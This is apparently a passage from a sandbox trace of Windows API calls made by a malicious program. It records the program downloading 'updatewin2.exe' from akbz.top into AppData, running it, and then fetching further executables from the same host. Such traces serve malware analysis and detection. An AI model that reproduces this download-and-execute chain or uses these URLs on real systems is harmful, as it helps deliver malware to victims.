lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0126.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0126.674] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://akbz.top/files/penelop/updatewin2.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0127.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0127.354] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9a0d6d0, lpdwBufferLength=0x9a0d710, lpdwIndex=0x0 | out: lpBuffer=0x9a0d6d0*, lpdwBufferLength=0x9a0d710*=0x4, lpdwIndex=0x0) returned 1 [0127.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3223450 [0127.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3254c68 [0127.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3223450 | out: hHeap=0x620000) returned 1 [0127.354] lstrcpyA (in: lpString1=0x321e628, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594" [0127.354] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594", pMore="updatewin2.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin2.exe") returned 1 [0127.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325af48 [0127.355] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin2.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x698 [0127.355] SetFilePointer (in: hFile=0x698, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.355] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0127.357] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.358] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0127.530] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.530] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0127.531] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.531] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0127.532] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.532] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0127.587] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.587] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0127.588] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.588] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0127.589] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.589] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0127.589] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.590] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0127.590] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.591] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0127.864] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.864] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0127.865] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.865] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0127.865] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.866] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0127.866] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.867] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0127.867] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.867] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0127.868] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.868] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0127.868] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.869] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0128.041] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0128.042] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0128.042] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0128.042] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0128.043] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0128.043] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0128.043] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0128.043] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0128.044] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0128.044] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0128.044] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0128.045] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0128.228] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0128.228] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0128.229] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0128.229] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0128.230] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0128.230] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0128.231] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0128.233] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0128.233] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0128.233] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x1200) returned 1 [0128.234] WriteFile (in: hFile=0x698, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x1200, lpOverlapped=0x0) returned 1 [0128.234] CloseHandle (hObject=0x698) returned 1 [0128.446] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0128.453] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0128.453] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin2.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0128.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325af48 | out: hHeap=0x620000) returned 1 [0128.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3254c68 | out: hHeap=0x620000) returned 1 [0128.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325bc58 | out: hHeap=0x620000) returned 1 [0128.838] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0128.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3271f60 [0128.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85e) returned 0x325bc58 [0128.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3271f60, cbMultiByte=-1, lpWideCharStr=0x325bc58, cchWideChar=1071 | out: lpWideCharStr="http://akbz.top/files/penelop/updatewin.exe") returned 44 [0128.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3290eb8 [0128.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325bc58 | out: hHeap=0x620000) returned 1 [0128.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3271f60 | out: hHeap=0x620000) returned 1 [0128.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x325bc58 [0128.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82f) returned 0x9aafb40 [0128.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://akbz.top/files/penelop/updatewin.exe", cchWideChar=-1, lpMultiByteStr=0x9aafb40, cbMultiByte=2095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://akbz.top/files/penelop/updatewin.exe", lpUsedDefaultChar=0x0) returned 44 [0128.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0128.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0128.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325bc58 | out: hHeap=0x620000) returned 1 [0128.839] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://akbz.top/files/penelop/updatewin.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0129.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0129.026] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9a0d6d0, lpdwBufferLength=0x9a0d710, lpdwIndex=0x0 | out: lpBuffer=0x9a0d6d0*, lpdwBufferLength=0x9a0d710*=0x4, lpdwIndex=0x0) returned 1 [0129.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0129.026] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0129.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3271f60 [0129.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84e) returned 0x325bc58 [0129.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3271f60, cbMultiByte=-1, lpWideCharStr=0x325bc58, cchWideChar=1063 | out: lpWideCharStr="http://akbz.top/files/penelop/3.exe") returned 36 [0129.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x3290eb8 [0129.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325bc58 | out: hHeap=0x620000) returned 1 [0129.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3271f60 | out: hHeap=0x620000) returned 1 [0129.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x325bc58 [0129.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x827) returned 0x3281f68 [0129.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://akbz.top/files/penelop/3.exe", cchWideChar=-1, lpMultiByteStr=0x3281f68, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://akbz.top/files/penelop/3.exe", lpUsedDefaultChar=0x0) returned 36 [0129.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0129.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3281f68 | out: hHeap=0x620000) returned 1 [0129.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325bc58 | out: hHeap=0x620000) returned 1 [0129.027] InternetOpenUrlA (hInternet=0xcc0010, lpszUrl="http://akbz.top/files/penelop/3.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0129.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0129.757] HttpQueryInfoW (in: hRequest=0xcc0018, dwInfoLevel=0x20000013, lpBuffer=0x9a0d6d0, lpdwBufferLength=0x9a0d710, lpdwIndex=0x0 | out: lpBuffer=0x9a0d6d0*, lpdwBufferLength=0x9a0d710*=0x4, lpdwIndex=0x0) returned 1 [0129.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0129.757] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc001c [0129.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272158 [0129.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84e) returned 0x325bc58 [0129.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3272158, cbMultiByte=-1, lpWideCharStr=0x325bc58, cchWideChar=1063 | out: lpWideCharStr="http://akbz.top/files/penelop/4.exe") returned 36 [0129.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x3290eb8 [0129.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325bc58 | out: hHeap=0x620000) returned 1 [0129.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272158 | out: hHeap=0x620000) returned 1 [0129.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x325bc58 [0129.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x827) returned 0x3281f68 [0129.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://akbz.top/files/penelop/4.exe", cchWideChar=-1, lpMultiByteStr=0x3281f68, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://akbz.top/files/penelop/4.exe", lpUsedDefaultChar=0x0) returned 36 [0129.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0129.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3281f68 | out: hHeap=0x620000) returned 1 [0129.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325bc58 | out: hHeap=0x620000) returned 1 [0129.758] InternetOpenUrlA (hInternet=0xcc001c, lpszUrl="http://akbz.top/files/penelop/4.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0024 [0129.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0129.932] HttpQueryInfoW (in: hRequest=0xcc0024, dwInfoLevel=0x20000013, lpBuffer=0x9a0d6d0, lpdwBufferLength=0x9a0d710, lpdwIndex=0x0 | out: lpBuffer=0x9a0d6d0*, lpdwBufferLength=0x9a0d710*=0x4, lpdwIndex=0x0) returned 1 [0129.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0129.932] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0028 [0129.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272200 [0129.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84e) returned 0x325bc58 [0129.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3272200, cbMultiByte=-1, lpWideCharStr=0x325bc58, cchWideChar=1063 | out: lpWideCharStr="http://akbz.top/files/penelop/5.exe") returned 36 [0129.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x3290eb8 [0129.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325bc58 | out: hHeap=0x620000) returned 1 [0129.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272200 | out: hHeap=0x620000) returned 1 [0129.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x325bc58 [0129.932] 